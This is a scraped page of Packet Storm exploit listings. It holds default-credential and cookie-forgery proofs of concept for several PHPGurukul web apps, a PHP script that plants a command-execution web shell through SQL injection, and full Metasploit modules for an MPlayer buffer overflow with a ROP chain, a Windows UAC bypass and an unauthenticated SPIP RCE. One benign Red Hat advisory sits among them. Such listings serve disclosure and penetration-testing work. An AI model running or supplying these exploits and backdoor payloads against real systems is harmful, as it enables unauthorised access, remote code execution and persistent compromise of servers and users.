Car Washing Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Car Washing Management System 1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/car-washing-management-system-using-php-and-mysql/                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Car Washing Management System 1.0 Insecure Settings

Bus Pass Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Bus Pass Management System 1.0 Insecure Settings Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/buspassms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Bus Pass Management System 1.0 Insecure Settings

BP Monitoring Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : BP Monitoring Management System 1.0 Insecure Settings Vulnerability                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: john@test.com      Password: Test@123[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

BP Monitoring Management System 1.0 Insecure Settings

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

Posted Sep 13, 2024

Authored by indoushka

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

tags | exploit

SHA-256 | 4c0788f43b5ea94beac369a15563afe012375eb20121975b115510c93def998e

Download | Favorite | View

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

    ====================================================================================================================================| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Cookie Handling Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The default username is admin & The chosen password is user123[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] Refresh the page http://127.0.0.1/studentms/admin/login.php or go to http://127.0.0.1/studentms/admin/dashboard.php Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,753)
*   Arbitrary (17,058)
*   BBS (2,859)
*   Bypass (1,912)
*   CGI (1,047)
*   Code Execution (7,889)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,422)
*   DoS (25,235)
*   Encryption (2,394)
*   Exploit (54,198)
*   File Inclusion (4,273)
*   File Upload (1,011)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,270)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,406)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,853)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,711)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,063)
*   Web (10,135)
*   Whitepaper (3,783)
*   x86 (970)
*   XSS (18,289)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,119)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,136)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,775)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling

Auto/Taxi Stand Management System version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Auto/Taxi Stand Management System 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/atsms/';// مسار ثابت لرفع الملف$path = 'C:\www\atsms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/admin/index.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Auto/Taxi Stand Management System 1.0 PHP Code Injection

Art Gallery Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Art Gallery Management System 1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: john@test.com      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Art Gallery Management System 1.0 Insecure Settings

Red Hat Security Advisory 2024-6657-03 - Migration Toolkit for Runtimes 1.2.7 release Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6657.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Migration Toolkit for Runtimes security, bug fix and enhancement updateAdvisory ID:        RHSA-2024:6657-03Product:            Migration Toolkit for RuntimesAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6657Issue date:         2024-09-12Revision:           03CVE Names:          CVE-2024-29025====================================================================Summary: Migration Toolkit for Runtimes 1.2.7 releaseRed Hat Product Security has rated this update as having a security impact of Moderate.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Migration Toolkit for Runtimes 1.2.7 ZIP artifactsSecurity Fix(es):* netty-codec-http: Allocation of Resources Without Limits or Throttling (CVE-2024-29025)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2024-29025References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes&downloadType=distributionshttps://issues.redhat.com/browse/WINDUP-4200

Red Hat Security Advisory 2024-6657-03

This Metasploit module exploits a stack-based buffer overflow vulnerability in MPlayer Lite r33064, caused by improper bounds checking of an URL entry. By persuading the victim to open a specially-crafted .M3U file, specifically by drag-and-dropping it to the player, a remote attacker can execute arbitrary code on the system.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = AverageRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::Seh  def initialize(info = {})    super(update_info(info,      'Name'           => 'MPlayer Lite M3U Buffer Overflow',      'Description'    => %q{        This module exploits a stack-based buffer overflow vulnerability in        MPlayer Lite r33064, caused by improper bounds checking of an URL entry.        By persuading the victim to open a specially-crafted .M3U file, specifically by        drag-and-dropping it to the player, a remote attacker can execute arbitrary        code on the system.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'C4SS!0 and h1ch4m', # Vulnerability discovery and original exploit          'Gabor Seljan',      # Metasploit module        ],      'References'     =>        [          [ 'BID', '46926' ],          [ 'EDB', '17013' ],          [ 'URL', 'http://www.mplayer-ww.com/eng/' ]        ],      'DefaultOptions' =>        {          'EXITFUNC' => 'thread'        },      'Platform'       => 'win',      'Payload'        =>        {          'BadChars'   => "\x00\x20\x0d\x0a\x1a\x2c\x2e\x26\x2f\x3a\x3e\x3f\x5c",          'Space'      => 5040        },      'Targets'        =>        [          [ 'Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064',            {              'Offset' => 21,              'Ret'    => 0x649a7bbe  # ADD ESP,64C # PPPR [avformat-52.dll]            }          ],        ],      'Privileged'     => false,      'DisclosureDate' => '2011-03-19',      'DefaultTarget'  => 0))      register_options(        [          OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])        ],      self.class)  end  def junk    return rand_text_alpha(4).unpack("V").first  end  def nops    return make_nops(4).unpack("V").first  end  def exploit    # ROP chain generated by mona.py - See corelan.be    rop_gadgets =    [      0x6ad9d85d,  # POP EBP # RETN [avcodec-52.dll]      0x10018fc3,  # &CALL ESP [unrar.dll]      0x64984a70,  # POP EAX # RETN [avformat-52.dll]      0xffffec4f,  # Value to negate, will become 0x00005040      0x6b0ce791,  # NEG EAX # RETN [avcodec-52.dll]      0x6b063c7d,  # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll]      junk,      junk,      0x1001d154,  # POP EAX # RETN [unrar.dll]      0x77e71210,  # &VirtualProtect() [IAT RPCRT4.dll]      0x64987f7f,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-52.dll]      0x6afcdc68,  # XCHG EAX,ESI # RETN [avcodec-52.dll]      0x6b02836d,  # POP EAX # RETN [avcodec-52.dll]      0xffffffc0,  # Value to negate, will become 0x00000040      0x6b0ce791,  # NEG EAX # RETN [avcodec-52.dll]      0x6af79d80,  # XCHG EAX,EDX # RETN [avcodec-52.dll]      0x1001bad6,  # POP ECX # RETN [unrar.dll]      0x649eab48,  # &Writable location [avformat-52.dll]      0x6d7c0bb7,  # POP EDI # RETN [swscale-0.dll]      0x6b03d722,  # RETN (ROP NOP) [avcodec-52.dll]      0x64984a70,  # POP EAX # RETN [avformat-52.dll]      nops,      0x6d7c57d1   # PUSHAD # RETN [swscale-0.dll]    ].flatten.pack('V*')    sploit =  rand_text_alpha_upper(target['Offset'])    sploit << rop_gadgets    sploit << payload.encoded    sploit << generate_seh_record(target.ret)    sploit << rand_text_alpha_upper(1000) # Generate exception    # Create the file    print_status("Creating '#{datastore['FILENAME']}' file ...")    file_create("http://" + sploit)  endend

MPlayer Lite r33064 Buffer Overflow

This Metasploit module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Post::Windows::Priv  include Post::Windows::Runas  def initialize(info = {})    super(update_info(info,      'Name'          => 'Windows Escalate UAC Execute RunAs',      'Description'   => %q(        This module will attempt to elevate execution level using        the ShellExecute undocumented RunAs flag to bypass low        UAC settings.      ),      'License'       => MSF_LICENSE,      'Author'        => [        'mubix', # Original technique        'b00stfr3ak' # Added powershell option      ],      'Platform'      => ['win'],      'SessionTypes'  => ['meterpreter'],      'Targets'       => [['Windows', {}]],      'DefaultTarget' => 0,      'DisclosureDate' => '2012-01-03'    ))    register_options([      OptString.new('FILENAME', [false, 'File name on disk']),      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),    ])  end  def exploit    if is_uac_enabled?      print_status 'UAC is Enabled, checking level...'      case get_uac_level      when UAC_NO_PROMPT        print_good 'UAC is not enabled, no prompt for the user'      else        print_status "The user will be prompted, wait for them to click 'Ok'"      end    else      print_good 'UAC is not enabled, no prompt for the user'    end    case datastore['TECHNIQUE']    when 'EXE'      shell_execute_exe(datastore['FILENAME'], datastore['PATH'])    when 'PSH'      shell_execute_psh    end  endend

Windows Escalate UAC Execute RunAs

This Metasploit module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP. The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value. By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server. This critical vulnerability affects all versions of SPIP from 4.0 up to and including 4.3.1, 4.2.15, and 4.1.17. It allows unauthenticated users to execute arbitrary code remotely via the public interface. The vulnerability has been patched in versions 4.3.2, 4.2.16, and 4.1.18.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Payload::Php  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Spip  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'SPIP BigUp Plugin Unauthenticated RCE',        'Description' => %q{          This module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP.          The vulnerability lies in the `lister_fichiers_par_champs` function, which is triggered          when the `bigup_retrouver_fichiers` parameter is set to any value. By exploiting the improper          handling of multipart form data in file uploads, an attacker can inject and execute          arbitrary PHP code on the target server.          This critical vulnerability affects all versions of SPIP from 4.0 up to and including          4.3.1, 4.2.15, and 4.1.17. It allows unauthenticated users to execute arbitrary code          remotely via the public interface. The vulnerability has been patched in versions          4.3.2, 4.2.16, and 4.1.18.        },        'Author' => [          'Vozec',            # Vulnerability Discovery          'Laluka',           # Vulnerability Discovery          'Julien Voisin',    # Code Review          'Valentin Lobstein' # Metasploit Module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-8517'],          ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/'],          ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html']        ],        'Platform' => %w[php unix linux win],        'Arch' => %w[ARCH_PHP ARCH_CMD],        'Targets' => [          [            'PHP In-Memory', {              'Platform' => 'php',              'Arch' => ARCH_PHP              # tested with php/meterpreter/reverse_tcp            }          ],          [            'Unix/Linux Command Shell', {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows Command Shell', {              'Platform' => 'win',              'Arch' => ARCH_CMD              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp            }          ]        ],        'DefaultTarget' => 0,        'Privileged' => false,        'DisclosureDate' => '2024-09-06',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('FORM_PAGE', [true, 'A page with a form.', 'Auto'])      ]    )  end  def check    rversion = spip_version || spip_plugin_version('spip')    return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless rversion    print_status("SPIP Version detected: #{rversion}")    vulnerable_ranges = [      { start: Rex::Version.new('4.0.0'), end: Rex::Version.new('4.1.17') },      { start: Rex::Version.new('4.2.0'), end: Rex::Version.new('4.2.15') },      { start: Rex::Version.new('4.3.0'), end: Rex::Version.new('4.3.1') }    ]    is_vulnerable = vulnerable_ranges.any? { |range| rversion.between?(range[:start], range[:end]) }    unless is_vulnerable      return CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")    end    print_good("SPIP version #{rversion} is vulnerable.")    plugin_version = spip_plugin_version('bigup')    unless plugin_version      print_warning('Could not determine the version of the bigup plugin.')      return CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")    end    print_status("Bigup plugin version detected: #{plugin_version}")    if plugin_version < Rex::Version.new('3.2.12')      return CheckCode::Appears("Both the detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.")    end    CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")  end  # This function tests several pages to find a form with a valid CSRF token and its corresponding action.  # It allows the user to specify a URL via the FORM_PAGE option (e.g., spip.php?article1).  # We need to check multiple pages because the configuration of SPIP can vary.  def get_form_data    pages = %w[login spip_pass contact]    if datastore['FORM_PAGE']&.downcase != 'auto'      pages = [datastore['FORM_PAGE']]    end    pages.each do |page|      url = normalize_uri(target_uri.path, page.start_with?('/') ? page : "spip.php?page=#{page}")      res = send_request_cgi('method' => 'GET', 'uri' => url)      next unless res&.code == 200      doc = res.get_html_document      action = doc.at_xpath("//input[@name='formulaire_action']/@value")&.text      args = doc.at_xpath("//input[@name='formulaire_action_args']/@value")&.text      next unless action && args      print_status("Found formulaire_action: #{action}")      print_status("Found formulaire_action_args: #{args[0..20]}...")      return { action: action, args: args }    end    nil  end  # This function generates PHP code to execute a given payload on the target.  # We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.  # The payload is encoded in base64 to prevent issues with special characters.  # The generated PHP code includes the necessary preamble and system block to execute the payload.  # This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.  def php_exec_cmd(encoded_payload)    vars = Rex::RandomIdentifier::Generator.new    dis = "$#{vars[:dis]}"    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)    <<-END_OF_PHP_CODE              #{php_preamble(disabled_varname: dis)}              $c = base64_decode("#{encoded_clean_payload}");              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}    END_OF_PHP_CODE  end  def exploit    form_data = get_form_data    unless form_data      fail_with(Failure::NotFound, 'Could not retrieve formulaire_action or formulaire_action_args value from any page.')    end    print_status('Preparing to send exploit payload to the target...')    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)    b64_payload = framework.encoders.create('php/base64').encode(phped_payload).gsub(';', '')    post_data = Rex::MIME::Message.new    # This line is necessary for the form to be valid, works in tandem with formulaire_action_args    post_data.add_part(form_data[:action], nil, nil, 'form-data; name="formulaire_action"')    # This value is necessary for $_FILES to be used and for the bigup plugin to be "activated" for this request, thus triggering the vulnerability    post_data.add_part(Rex::Text.rand_text_alphanumeric(4, 8), nil, nil, 'form-data; name="bigup_retrouver_fichiers"')    # Injection is performed here. The die() function is used to avoid leaving traces in the logs,    # prevent errors, and stop the execution of PHP after the injection.    post_data.add_part('', nil, nil, "form-data; name=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}['.#{b64_payload}.die().']\"; filename=\"#{Rex::Text.rand_text_alphanumeric(4, 8)}\"")    # This is necessary for the form to be accepted    post_data.add_part(form_data[:args], nil, nil, 'form-data; name="formulaire_action_args"')    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'spip.php'),      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'data' => post_data.to_s    }, 1)  endend

Source

Packet Storm